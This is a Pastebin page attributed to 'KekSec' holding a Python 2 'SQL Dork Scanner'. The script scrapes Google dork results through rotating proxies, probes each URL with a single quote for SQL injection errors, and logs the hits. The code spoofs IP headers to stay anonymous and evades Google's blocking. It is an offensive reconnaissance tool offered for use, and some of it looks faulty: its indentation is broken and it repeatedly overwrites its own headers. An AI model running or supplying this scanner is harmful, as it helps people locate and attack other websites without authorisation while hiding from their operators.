API tools faq
paste
KekSec

SQL Dork Scanner [Ultimate]

KekSec
Nov 21st, 2017
1,525
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.01 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #Basic SQLi auto dorker and checker
  3. #coded by Freak/SynthMesc
  4. #Version 1.1.5
  5. import urllib2,urllib,sys,re,random,string,time,threading
  6. try:
  7.     dorklist=sys.argv[1]
  8.     proxylist=sys.argv[2]
  9. except:
  10.     print "Usage: "+sys.argv[0]+" [DORK LIST] [PROXY LIST]" #Simple usage for the skids out ther ^_^
  11.     exit(1)
  12. def randomIP():
  13.     return '.'.join('%s'%random.randint(0, 255) for i in range(4)) #Generate random IP for false headers
  14. def test(target,testchar, proxy):
  15.     try:
  16.         opener = urllib2.build_opener(proxy)
  17.         opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  18.         opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  19.         opener.addheaders = [('REMOTE-ADDR',randomIP())]
  20.         opener.addheaders = [('VIA',randomIP())]
  21.         opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
  22.         keywords=["SQL", "Warning", "Syntax"]
  23.         print "[+] Trying "+target+testchar
  24.         try:
  25.             resp=opener.open(target+testchar,timeout=5)
  26.         except Exception, e:
  27.             print "[-] "+str(e)
  28.             return
  29.         for keyword in keywords:
  30.             try:
  31.                 for x in resp.read().split(" "):
  32.                     if keyword in x:
  33.                         print "[+] Found keyword '"+keyword+"' at "+target+testchar
  34.                         f=open("SQLi_Vulnerable.txt","a")
  35.                         f.write(target+testchar+"\r\n")
  36.                         f.close()
  37.                         break
  38.             except urllib2.HTTPError as e:
  39.                 print "[-] "+str(e)
  40.                 pass
  41.     except urllib2.URLError as e:
  42.         print "[-] "+str(e)
  43.         pass
  44. def spyder(dork,page):
  45.         proxies = open(proxylist, "r").read().split("\n")
  46.         proxy = random.choice(proxies).split(" ")[0]
  47.         proxy = urllib2.ProxyHandler({'http': proxy})
  48.     opener = urllib2.build_opener(proxy)
  49.     opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  50.     opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  51.     opener.addheaders = [('REMOTE-ADDR',randomIP())]
  52.     opener.addheaders = [('VIA',randomIP())]
  53.     opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
  54.     opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
  55.     opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
  56.     opener.addheaders = [('Accept-Encoding','gzip, deflate')]
  57.     opener.addheaders = [('Referer',dork)]
  58.     try:
  59.         searchresults=opener.open(dork,timeout=5).read()
  60.     except Exception, e:
  61.         print "[-] "+str(e)
  62.         print "[-] Bot has been blocked from google!!! Switching proxy."
  63.         spyder(dork, page)
  64.     try:
  65.         searchresults
  66.     except NameError:
  67. #       print "[-] Variable undefined, re-searching"
  68.         try:
  69.             searchresults=opener.open(dork,timeout=5).read()
  70.         except:
  71.             try:
  72.                 searchresults=opener.open(dork,timeout=5).read()
  73.             except:
  74.                 print "[-] Bot has been blocked from google!!! Change VPN server or proxy! Press enter to continue"
  75.                 raw_input()
  76.                 spyder(dork, page)
  77.     else:
  78.         pass
  79. #       print "[+] Variable defined, continuing search"
  80.  
  81.     for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
  82.         i=i.replace("amp;",'')
  83.         if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
  84.             dorkurl="https://encrypted.google.com"+i
  85.             print "[+] Searching next page "+dorkurl
  86.             spyder(dorkurl,page)
  87.             page+=1
  88.         i=urllib2.unquote(i).decode('utf8')
  89.         try:
  90.             i=i.split("?q=")[1]
  91.             i=i.split("&sa=")[0]
  92.             if i.startswith("http"):
  93.                     if i.startswith("http://accounts.google.com"):
  94.                         continue
  95.                     elif i.startswith("http://www.google.com"):
  96.                         continue
  97.                     elif i.startswith("http://encrypted.google.com"):
  98.                         continue
  99.                     elif i.startswith("http://webcache.googleusercontent.com"):
  100.                         continue
  101.                     elif i!=dork.decode('utf8'):
  102.                         threading.Thread(target=test, args=(i,"'",proxy,)).start()
  103.         except:
  104.             continue
  105. f=open(dorklist,"r")
  106. for dork in f.read().split("\n"):
  107.     print "[+] Searching for dork: '"+dork+"'"
  108.     spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
  109. f.close()
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!